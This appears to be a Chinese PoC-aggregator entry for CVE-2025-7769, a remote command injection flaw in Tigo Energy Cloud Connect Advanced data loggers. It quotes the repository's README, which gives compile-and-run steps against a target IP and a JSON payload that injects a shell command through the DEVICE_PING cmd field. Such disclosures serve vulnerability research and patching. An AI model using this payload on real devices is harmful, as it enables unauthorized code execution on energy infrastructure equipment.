POC详情: 726b860d39aa0f3f1d279acff03fb1674c2f016c

来源
https://github.com/byteReaper77/CVE-2025-7769
关联漏洞
标题: Tigo Energy Cloud Connect Advanced 命令注入漏洞 (CVE-2025-7769)
描述:Tigo Energy Cloud Connect Advanced是美国Tigo Energy公司的一款紧凑型数据记录器。 Tigo Energy Cloud Connect Advanced存在命令注入漏洞,该漏洞源于命令注入,可能导致远程代码执行。
描述
PoC to inject a command via the DEVICE_PING endpoint
介绍
# CVE-2025-7769 – Remote Command Injection in mobile_api

## Description :

This repository contains a Proof‑of‑Concept (PoC) exploit for **CVE‑2025‑7769**, a critical remote **Command Injection** vulnerability found in Tigo Energy CCA appliances exposing the `/cgi-bin/mobile_api` endpoint.

The vulnerability is triggered by injecting OS commands via the `cmd` JSON key, where unfiltered input is concatenated directly into a system call, allowing full remote code execution (RCE) on the device.

## References :
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-7769

## Usage :

```
gcc exploit.c argparse.c -o CVE-2025-7769 -lcurl
./CVE-2025-7769 -i 10.0.2.15 -p 80 -v
Replace 10.0.2.15 with the target IP.

Use -u http://target.com if you want to pass a full base URL instead of IP/port.

Example Payload :

{
  "cmd": "DEVICE_PING;id",
  "dev": 2,
  "ver": 1
}
```
## License :
MIT License
文件快照

 [4.0K]  /data/pocs/726b860d39aa0f3f1d279acff03fb1674c2f016c
├── [ 15K]  exploit.c
├── [1.0K]  LICENSE
└── [ 948]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。